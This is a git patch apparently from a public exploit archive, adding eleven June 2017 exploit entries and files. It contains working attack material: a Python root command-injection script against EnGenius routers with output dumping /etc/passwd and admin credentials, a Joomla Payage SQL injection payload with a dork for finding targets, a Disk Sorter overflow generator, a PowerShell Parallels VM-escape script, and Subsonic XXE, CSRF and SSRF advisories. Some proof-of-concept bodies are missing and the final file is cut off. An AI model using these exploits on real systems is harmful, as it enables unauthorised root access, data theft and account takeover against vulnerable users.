From cd6e21e600ea362e18c43dbb346e4c8d206e824e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 6 Jun 2017 05:01:15 +0000 Subject: [PATCH] DB: 2017-06-06 11 new exploits Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow DNSTracer 1.8.1 - Buffer Overflow Parallels Desktop - Virtual Machine Escape Subsonic 6.1.1 - XML External Entity Injection BIND 9.10.5 - Unquoted Service Path Privilege Escalation Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution Subsonic 6.1.1 - Cross-Site Request Forgery Subsonic 6.1.1 - Server-Side Request Forgery Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting --- files.csv | 12 +- .../hardware/remote/{41874.py => 42122.py} | 0 platforms/hardware/webapps/42114.py | 127 ++++++++++++++++++ platforms/linux/dos/42115.txt | 73 ++++++++++ platforms/php/webapps/42113.txt | 27 ++++ platforms/windows/dos/42112.py | 27 ++++ platforms/windows/local/42116.txt | 57 ++++++++ platforms/windows/local/42119.txt | 102 ++++++++++++++ platforms/windows/local/42121.txt | 90 +++++++++++++ platforms/windows/webapps/42117.txt | 86 ++++++++++++ platforms/windows/webapps/42118.txt | 117 ++++++++++++++++ platforms/windows/webapps/42120.txt | 96 +++++++++++++ 12 files changed, 813 insertions(+), 1 deletion(-) rename platforms/hardware/remote/{41874.py => 42122.py} (100%) create mode 100755 platforms/hardware/webapps/42114.py create mode 100755 platforms/linux/dos/42115.txt create mode 100755 platforms/php/webapps/42113.txt create mode 100755 platforms/windows/dos/42112.py create mode 100755 platforms/windows/local/42116.txt create mode 100755 platforms/windows/local/42119.txt create mode 100755 platforms/windows/local/42121.txt create mode 100755 platforms/windows/webapps/42117.txt create mode 100755 platforms/windows/webapps/42118.txt create mode 100755 platforms/windows/webapps/42120.txt diff --git a/files.csv b/files.csv index 08bccf78e..acfe8f2c2 100644 --- a/files.csv +++ b/files.csv @@ -5526,6 +5526,8 @@ id,file,description,date,author,platform,type,port 42104,platforms/multiple/dos/42104.js,"WebKit JSC - Incorrect Check in emitPutDerivedConstructorToArrowFunctionContextScope",2017-06-01,"Google Security Research",multiple,dos,0 42108,platforms/multiple/dos/42108.html,"WebKit - 'Element::setAttributeNodeNS' Use-After-Free",2017-06-01,"Google Security Research",multiple,dos,0 42110,platforms/linux/dos/42110.txt,"reiserfstune 3.6.25 - Local Buffer Overflow",2017-06-02,"Nassim Asrir",linux,dos,0 +42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-02,n3ckD_,windows,dos,0 +42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow",2017-06-05,FarazPajohan,linux,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -9024,6 +9026,9 @@ id,file,description,date,author,platform,type,port 42059,platforms/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,windows,local,0 42076,platforms/linux/local/42076.py,"JAD java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",linux,local,0 42077,platforms/windows/local/42077.txt,"Microsoft MsMpEng - Multiple Problems Handling ntdll!NtControlChannel Commands",2017-05-26,"Google Security Research",windows,local,0 +42116,platforms/windows/local/42116.txt,"Parallels Desktop - Virtual Machine Escape",2017-06-05,"Mohammad Reza Espargham",windows,local,0 +42119,platforms/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,windows,local,0 +42121,platforms/windows/local/42121.txt,"BIND 9.10.5 - Unquoted Service Path Privilege Escalation",2017-06-05,hyp3rlinx,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15528,7 +15533,7 @@ id,file,description,date,author,platform,type,port 41852,platforms/windows/remote/41852.txt,"Moxa MX AOPC-Server 1.5 - XML External Entity Injection",2017-04-10,hyp3rlinx,windows,remote,0 41861,platforms/linux/remote/41861.py,"Quest Privilege Manager 6.0.0 - Arbitrary File Write",2017-04-10,m0t,linux,remote,0 41872,platforms/hardware/remote/41872.py,"Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,23 -41874,platforms/hardware/remote/41874.py,"Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,0 +42122,platforms/hardware/remote/42122.py,"Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,23 41892,platforms/linux/remote/41892.sh,"Tenable Appliance < 4.5 - Unauthenticated Root Remote Code Execution",2017-04-18,agix,linux,remote,8000 41894,platforms/windows/remote/41894.py,"Microsoft Word - '.RTF' Remote Code Execution",2017-04-18,"Bhadresh Patel",windows,remote,0 41895,platforms/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,hardware,remote,0 @@ -37942,3 +37947,8 @@ id,file,description,date,author,platform,type,port 42105,platforms/multiple/webapps/42105.html,"WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0 42106,platforms/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0 42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0 +42113,platforms/php/webapps/42113.txt,"Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection",2017-06-03,"Persian Hack Team",php,webapps,0 +42114,platforms/hardware/webapps/42114.py,"EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution",2017-06-04,LiquidWorm,hardware,webapps,0 +42117,platforms/windows/webapps/42117.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0 +42118,platforms/windows/webapps/42118.txt,"Subsonic 6.1.1 - Server-Side Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0 +42120,platforms/windows/webapps/42120.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2017-06-05,hyp3rlinx,windows,webapps,0 diff --git a/platforms/hardware/remote/41874.py b/platforms/hardware/remote/42122.py similarity index 100% rename from platforms/hardware/remote/41874.py rename to platforms/hardware/remote/42122.py diff --git a/platforms/hardware/webapps/42114.py b/platforms/hardware/webapps/42114.py new file mode 100755 index 000000000..770c0470c --- /dev/null +++ b/platforms/hardware/webapps/42114.py @@ -0,0 +1,127 @@ +#!/usr/bin/env python +# coding: utf8 +# +# +# EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution +# +# +# Vendor: EnGenius Technologies Inc. +# Product web page: https://www.engeniustech.com +# Affected version: ESR300 (1.4.9, 1.4.7, 1.4.2, 1.4.1.28, 1.4.0, 1.3.1.42, 1.1.0.28) +# ESR350 (1.4.11, 1.4.9, 1.4.5, 1.4.2, 1.4.0, 1.3.1.41, 1.1.0.29) +# ESR600 (1.4.11, 1.4.9, 1.4.5, 1.4.3, 1.4.2, 1.4.1, 1.4.0.23, 1.3.1.63, 1.2.1.46, 1.1.0.50) +# EPG5000 (1.3.9.21, 1.3.7.20, 1.3.3.17, 1.3.3, 1.3.2, 1.3.0, 1.2.0) +# ESR900 (1.4.5, 1.4.3, 1.4.0, 1.3.5.18 build-12032015@liwei (5668b74), 1.3.1.26, 1.3.0, 1.2.2.23, 1.1.0) +# ESR1200 (1.4.5, 1.4.3, 1.4.1, 1.3.1.34, 1.1.0) +# ESR1750 (1.4.5, 1.4.3, 1.4.1, 1.4.0, 1.3.1.34, 1.3.0, 1.2.2.27, 1.1.0) +# +# Summary: With the EnGenius IoT Gigabit Routers and free EnShare app, use +# your iPhone, iPad or Android-based tablet or smartphone to transfer +# video, music and other files to and from a router-attached USB hard +# drive. Enshare is a USB media storage sharing application that enables +# access to files remotely. The EnShare feature allows you to access media +# content stored on a USB hard drive connected to the router's USB port in +# the home and when you are away from home when you have access to the Internet. +# By default the EnShare feature is enabled. +# +# EnShareTM supports both FAT32 and NTFS USB formats. Transfer speeds of data +# from your router-attached USB storage device to a remote/mobile device may +# vary based on Internet uplink and downlink speeds. The router's design enables +# users to connect numerous wired and wireless devices to it and supports intensive +# applications like streaming HD video and sharing of media in the home and accessing +# media away from the home with EnShare - Your Personal Media Cloud. +# +# Desc: EnGenius EnShare suffers from an unauthenticated command injection +# vulnerability. An attacker can inject and execute arbitrary code as the +# root user via the 'path' GET/POST parameter parsed by 'usbinteract.cgi' +# script. +# +# ======================================================================= +# +# bash-4.4$ python enshare.py 10.0.0.17 +# [+] Command: ls -alsh +# 44 -rwxr-xr-x 1 0 0 42.5K Oct 31 2014 getsize.cgi +# 4 -rwxr-xr-x 1 0 0 606 Oct 31 2014 languageinfo.cgi +# 48 -rwxr-xr-x 1 0 0 44.2K Oct 31 2014 upload.cgi +# 48 -rwxr-xr-x 1 0 0 44.5K Oct 31 2014 usbinfo.cgi +# 56 -rwxr-xr-x 1 0 0 54.1K Oct 31 2014 usbinteract.cgi +# 0 drwxr-xr-x 4 0 0 0 Jun 3 00:52 .. +# 0 drwxr-xr-x 2 0 0 0 Oct 31 2014 . +# +# [+] Command: id +# uid=0(root) gid=0(root) +# +# [+] Command: cat /etc/passwd +# +# Connecting to 10.0.0.17 port 9000 +# +# HTTP/1.1 200 OK +# root: !:0:0:root:/root:/bin/sh +# administrator: *:65534:65534:administrator:/var:/bin/false +# admin: *:60000:60000:webaccount:/home:/usr/bin/sh +# guest: *:60001:60000:webaccount:/home:/usr/bin/sh +# Content-type: text/html +# Transfer-Encoding: chunked +# Date: Sat, 03 Jun 2017 13:48:14 GMT +# Server: lighttpd/1.4.31 +# +# 0 +# [+] Command: pwd +# /www/web/cgi-bin +# [+] Command: cat /etc/account.conf +# +# HTTP/1.1 200 OK +# 1: admin:admin:4 +# 1: guest:guest:1 +# Content-type: text/html +# Transfer-Encoding: chunked +# Date: Sat, 03 Jun 2017 14:53:42 GMT +# Server: lighttpd/1.4.31 +# bash-4.4$ +# +# ======================================================================= +# +# Tested on: Linux 2.6.36 (mips) +# Embedded HTTP Server ,Firmware Version 5.11 +# lighttpd/1.4.31 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2017-5413 +# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5413.php +# +# +# 17.05.2017 +# + + +import sys, socket + +if len(sys.argv) < 2: + print 'Usage: enshare.py [port]\n' + quit() + +ip = sys.argv[1] +port = 9000 if len(sys.argv) < 3 else int(sys.argv[2]) +cmd = raw_input('[+] Command: ') + +payload = 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\n' +payload += 'Host: {0}:{1}\r\n' +payload += 'Content-Length: {2}\r\n' +payload += 'Content-Type: application/x-www-form-urlencoded\r\n\r\n' +payload += 'action=7&path=\"|{3}||\"' + +msg = payload.format( ip, port, len(cmd)+19, cmd ) + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +target = (ip, port) +print >>sys.stderr, '\nConnecting to %s port %s\n' % target +s.connect(target) +s.sendall(msg) +response = s.recv(5000) +s.close() + +print response.strip() diff --git a/platforms/linux/dos/42115.txt b/platforms/linux/dos/42115.txt new file mode 100755 index 000000000..2f47447b2 --- /dev/null +++ b/platforms/linux/dos/42115.txt @@ -0,0 +1,73 @@ +################ +#Exploit Title: DNSTracer Stack-based Buffer Overflow +#CVE: CVE-2017-9430 +#CWE: CWE-119 +#Exploit Author: Hosein Askari (FarazPajohan) +#Vendor HomePage: http://www.mavetju.org +#Version : 1.8.1 +#Tested on: Parrot OS +#Date: 04-06-2017 +#Category: Application +#Author Mail : hosein.askari@aol.com +#Description: Stack-based buffer overflow in dnstracer through 1.9 allows = +attackers to cause a denial of service (application crash) or possibly hav= +e unspecified other impact via a command line with a long name argument tha= +t is mishandled in a strcpy call for argv[0]. An example threat model is a = +web application that launches dnstracer with an untrusted name string. +############################### + +#dnstracer -v $(python -c 'print "A"*1025') +*** buffer overflow detected ***: dnstracer terminated +=3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D +/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb] +/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037] +/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170] +/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2] +dnstracer(+0x2c8f)[0x5634368aac8f] +/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1] +dnstracer(+0x2fca)[0x5634368aafca] +=3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D +5634368a8000-5634368b0000 r-xp 00000000 08:01 4850311 /u= +sr/bin/dnstracer +563436aaf000-563436ab0000 r--p 00007000 08:01 4850311 /u= +sr/bin/dnstracer +563436ab0000-563436ab1000 rw-p 00008000 08:01 4850311 /u= +sr/bin/dnstracer +563436ab1000-563436ab3000 rw-p 00000000 00:00 0=20 +563436c1d000-563436c3e000 rw-p 00000000 00:00 0 [h= +eap] +7ff6e7766000-7ff6e777c000 r-xp 00000000 08:01 25823192 /l= +ib/x86_64-linux-gnu/libgcc_s.so.1 +7ff6e777c000-7ff6e797b000 ---p 00016000 08:01 25823192 /l= +ib/x86_64-linux-gnu/libgcc_s.so.1 +7ff6e797b000-7ff6e797c000 r--p 00015000 08:01 25823192 /l= +ib/x86_64-linux-gnu/libgcc_s.so.1 +7ff6e797c000-7ff6e797d000 rw-p 00016000 08:01 25823192 /l= +ib/x86_64-linux-gnu/libgcc_s.so.1 +7ff6e797d000-7ff6e7b12000 r-xp 00000000 08:01 25823976 /l= +ib/x86_64-linux-gnu/libc-2.24.so +7ff6e7b12000-7ff6e7d11000 ---p 00195000 08:01 25823976 /l= +ib/x86_64-linux-gnu/libc-2.24.so +7ff6e7d11000-7ff6e7d15000 r--p 00194000 08:01 25823976 /l= +ib/x86_64-linux-gnu/libc-2.24.so +7ff6e7d15000-7ff6e7d17000 rw-p 00198000 08:01 25823976 /l= +ib/x86_64-linux-gnu/libc-2.24.so +7ff6e7d17000-7ff6e7d1b000 rw-p 00000000 00:00 0=20 +7ff6e7d1b000-7ff6e7d3e000 r-xp 00000000 08:01 25823455 /l= +ib/x86_64-linux-gnu/ld-2.24.so +7ff6e7f13000-7ff6e7f15000 rw-p 00000000 00:00 0=20 +7ff6e7f3a000-7ff6e7f3e000 rw-p 00000000 00:00 0=20 +7ff6e7f3e000-7ff6e7f3f000 r--p 00023000 08:01 25823455 /l= +ib/x86_64-linux-gnu/ld-2.24.so +7ff6e7f3f000-7ff6e7f40000 rw-p 00024000 08:01 25823455 /l= +ib/x86_64-linux-gnu/ld-2.24.so +7ff6e7f40000-7ff6e7f41000 rw-p 00000000 00:00 0=20 +7ffded62d000-7ffded64e000 rw-p 00000000 00:00 0 [s= +tack] +7ffded767000-7ffded769000 r--p 00000000 00:00 0 [v= +var] +7ffded769000-7ffded76b000 r-xp 00000000 00:00 0 [v= +dso] +ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [v= +syscall] +Aborted diff --git a/platforms/php/webapps/42113.txt b/platforms/php/webapps/42113.txt new file mode 100755 index 000000000..9aba5084f --- /dev/null +++ b/platforms/php/webapps/42113.txt @@ -0,0 +1,27 @@ +# Exploit Title: Joomla Payage 2.05 - SQL Injection +# Exploit Author: Persian Hack Team +# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi) +# Vendor Home : https://extensions.joomla.org/extensions/extension/e-commerce/payment-systems/payage/ +# My Home : http://persian-team.ir/ +# Google Dork : inurl:index.php?option=com_payage +# Telegram Channel: @PersianHackTeam +# Tested on: Linux +# Date: 2017-06-03 + +# POC : +# SQL Injection : + +Parameter: aid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: option=com_payage&task=make_payment&aid=1001' AND 6552=6552 AND 'dCgx'='dCgx&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid= + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (SELECT) + Payload: option=com_payage&task=make_payment&aid=1001' AND (SELECT * FROM (SELECT(SLEEP(5)))JBKV) AND 'XFWL'='XFWL&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid= +--- + +http://server/index.php?option=com_payage&task=make_payment&aid=[SQL]&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid= + +# Greetz : T3NZOG4N & FireKernel +# Iranian White Hat Hackers diff --git a/platforms/windows/dos/42112.py b/platforms/windows/dos/42112.py new file mode 100755 index 000000000..8a63e8aaa --- /dev/null +++ b/platforms/windows/dos/42112.py @@ -0,0 +1,27 @@ +#!/usr/bin/python + +###################################### +# Exploit Title: DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC +# Date: 25 May 2017 +# Exploit Author: n3ckD_ +# Vendor Homepage: http://www.disksorter.com/ +# Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe +# Version: Disk Sorter v9.7.14 (32-Bit) +# Tested on: Windows 7 Enterprise SP1 (Build 7601) +# Usage: Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog +###################################### + +print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC" +print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog" + +# in libspg:.text +# 10147C1C 58 POP EAX +# 10147C1D C3 RETN +ret = "\x1c\x7c\x14\x10" + +nops = "\x47\x4F"*24 +buf = nops + "A"*4048 + ret + "MAGIC" + "\n" + +f = open("poc.txt","w") +f.write(buf) +f.close() \ No newline at end of file diff --git a/platforms/windows/local/42116.txt b/platforms/windows/local/42116.txt new file mode 100755 index 000000000..deff45020 --- /dev/null +++ b/platforms/windows/local/42116.txt @@ -0,0 +1,57 @@ +#[+] Title:  Parallels Desktop - Virtual Machine Escape +#[+] Product: Parallels +#[+] Vendor: http://www.parallels.com/products/desktop/ +#[+] Affected Versions: All Version +# +# +# Author      :   Mohammad Reza Espargham +# Linkedin    :   https://ir.linkedin.com/in/rezasp +# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com +# Website     :   www.reza.es +# Twitter     :   https://twitter.com/rezesp +# FaceBook    :   https://www.facebook.com/reza.espargham +# Github : github.com/rezasp +# youtube : https://youtu.be/_nZ4y0ZTrwA +# +# + +#There is a security issue in the shared folder implementation in Parallels Desktop +#DLL : PrlToolsShellExt.dll 10.2.0 (28956) +#prl_tg Driver + + +#Very simple exploit with powershell +#powershell.exe poc.ps1 + +#Write OSX Executable file in temp +[io.file]::WriteAllText($env:temp + '\r3z4.command',"Say 'You are hacked by 1337'") + + +add-type -AssemblyName microsoft.VisualBasic + +add-type -AssemblyName System.Windows.Forms + +#open temp in explorer +explorer $env:temp + +#wait for 500 miliseconds +start-sleep -Milliseconds 500 + +#select Temp active window +[Microsoft.VisualBasic.Interaction]::AppActivate("Temp") + +#find r3z4.command file +[System.Windows.Forms.SendKeys]::SendWait("r3z4") + +#right click +[System.Windows.Forms.SendKeys]::SendWait("+({F10})") + +#goto "Open on Mac" in menu +[System.Windows.Forms.SendKeys]::SendWait("{DOWN}") +[System.Windows.Forms.SendKeys]::SendWait("{DOWN}") +[System.Windows.Forms.SendKeys]::SendWait("{DOWN}") + +#Click Enter +[System.Windows.Forms.SendKeys]::SendWait("~") + +#Enjoy ;)s \ No newline at end of file diff --git a/platforms/windows/local/42119.txt b/platforms/windows/local/42119.txt new file mode 100755 index 000000000..5fb7ba719 --- /dev/null +++ b/platforms/windows/local/42119.txt @@ -0,0 +1,102 @@ +[+] Credits: John Page a.k.a hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-XML-EXTERNAL-ENITITY.txt +[+] ISR: ApparitionSec + + + +Vendor: +================ +www.subsonic.org + + + +Product: +=============== +subsonic v6.1.1 + +Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection. + + + +Vulnerability Type: +==================== +XML External Entity + + + +CVE Reference: +============== +CVE-2017-9355 + + + + +Security Issue: +================ +subsonic import playlist feature is succeptible to XML External Entity attack. To exploit a User must be tricked to +import a malicious .XSPF playlist file. The XXE injection can be used to target various hosts from the internal network +to bypass Firewall or from the internet as XML External Entity is related to Server Side Request Forgery (SSRF) attacks. + + + + +Exploit/POC: +============= +1) Create some playlist file "RainbowsNUnic0rns.xspf" + + + +%mmmm;]> + + +2) Import as playlist. + + +3) Start listener. + +nc.exe -llvp 1337 +listening on [any] 1337 ... + +connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428 +GET / HTTP/1.1 +Cache-Control: no-cache +Pragma: no-cache +User-Agent: Java/1.8.0_45 +Host: 127.0.0.1:1337 +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: keep-alive + + + +Network Access: +=============== +Remote + + + + +Severity: +========= +High + + + +Disclosure Timeline: +================================== +Vendor Notification: May 29, 2017 +Vendor Acknowledgement: May 30, 2017 +June 4, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/platforms/windows/local/42121.txt b/platforms/windows/local/42121.txt new file mode 100755 index 000000000..4f4120cba --- /dev/null +++ b/platforms/windows/local/42121.txt @@ -0,0 +1,90 @@ +[+] Credits: John Page aka hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/BIND9-PRIVILEGE-ESCALATION.txt +[+] ISR: ApparitionSec + + + +Vendor: +=========== +www.isc.org + + + +Product: +=========== +BIND9 +v9.10.5 x86 / x64 + + +BIND is open source software that enables you to publish your Domain Name System (DNS) information on the Internet, and to resolve DNS +queries for your users. The name BIND stands for “Berkeley Internet Name Domain”, because the software originated in the early 1980s +at the University of California at Berkeley. + + + +Vulnerability Type: +=================== +Privilege Escalation + + + +CVE Reference: +============== +CVE-2017-3141 + + + +Security Issue: +================ +BIND installs as a service with an unquoted service path, to exploit a local attacker must place +a malicious executable file named "Program.exe" in the path of the service, if the process runs under +some account other than the attackers it can be used to exec code under a different set of privileges. + + +C:\>sc qc named +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: named + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\ISC BIND 9\bin\named.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : ISC BIND + DEPENDENCIES : + SERVICE_START_NAME : .\named + + + + + +Network Access: +=============== +Local + + + + +Severity: +========= +Medium + + + +Disclosure Timeline: +================================== +Vendor Notification: May 13, 2017 +Vendor confirm: May 14, 2017 +June 4, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). \ No newline at end of file diff --git a/platforms/windows/webapps/42117.txt b/platforms/windows/webapps/42117.txt new file mode 100755 index 000000000..4b2c48b75 --- /dev/null +++ b/platforms/windows/webapps/42117.txt @@ -0,0 +1,86 @@ +[+] Credits: John Page a.k.a hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-PASSWORD-RESET-CSRF.txt +[+] ISR: ApparitionSec + + + +Vendor: +================ +www.subsonic.org + + + +Product: +=============== +subsonic v6.1.1 + +Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection. + + + +Vulnerability Type: +===================== +CSRF - Password Reset + + + +CVE Reference: +============== +CVE-2017-9415 + + + +Security Issue: +================ +Remote attackers can reset subsonic user account passwords if an authenticated user clicks a malicious link +or visits an attacker controlled webpage. However, username must be known or guessed. + + + + +Exploit/POC: +============= +
+ + + + + + + + +
+ + + +Network Access: +=============== +Remote + + + + +Severity: +========= +High + + + +Disclosure Timeline: +============================= +Vendor Notification: May 29, 2017 +Vendor Acknowledgement: May 30, 2017 +June 4, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/platforms/windows/webapps/42118.txt b/platforms/windows/webapps/42118.txt new file mode 100755 index 000000000..d6fcd207e --- /dev/null +++ b/platforms/windows/webapps/42118.txt @@ -0,0 +1,117 @@ +[+] Credits: John Page a.k.a hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-SERVER-SIDE-REQUEST-FORGERY.txt +[+] ISR: ApparitionSec + + +Vendor: +================ +www.subsonic.org + + + +Product: +=============== +subsonic v6.1.1 + +Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection. + + + +Vulnerability Type: +================================== +CSRF - Server Side Request Forgery + + + +CVE Reference: +============== +CVE-2017-9413 + + + +Security Issue: +================ +Remote attackers can abuse the Podcast feature of subsonic to launch Server Side Request Forgery attacks on the internal network +or to the internet if an authenticated user clicks a malicious link or visits an attacker controlled webpage. SSRF can be used to +bypass Firewall restriction on LAN. + +e.g + +nc.exe -llvp 1337 +listening on [any] 1337 ... + +connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428 +GET / HTTP/1.1 +Cache-Control: no-cache +Pragma: no-cache +User-Agent: Java/1.8.0_45 +Host: 127.0.0.1:1337 +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: keep-alive + + +Exploit/POC: +============= +nc.exe -llvp 1337 +listening on [any] 1337 ... + + +1) Subscribe to Podcast CSRF Persistent SSRF + +
+ + + +
+ + +nc.exe -llvp 5555 +listening on [any] 5555 ... + + +2) Interet Radio Settings CSRF Persistent SSRF + +
+ + + + + + + + + +
+ + + +Network Access: +=============== +Remote + + + +Severity: +========= +High + + + +Disclosure Timeline: +================================== +Vendor Notification: May 29, 2017 +Vendor Acknowledgement: May 30, 2017 +June 4, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/platforms/windows/webapps/42120.txt b/platforms/windows/webapps/42120.txt new file mode 100755 index 000000000..61de023bb --- /dev/null +++ b/platforms/windows/webapps/42120.txt @@ -0,0 +1,96 @@ +[+] Credits: John Page a.k.a hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-PERSISTENT-XSS.txt +[+] ISR: ApparitionSec + + +Vendor: +================ +www.subsonic.org + + + +Product: +=============== +subsonic v6.1.1 + +Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection. + + + +Vulnerability Type: +====================== +CSRF - Persistent XSS + + + +CVE Reference: +============== +CVE-2017-9414 + + + +Security Issue: +================ +Remote attackers can abuse the Subscribe to Podcast feature of subsonic to store persistent XSS payloads 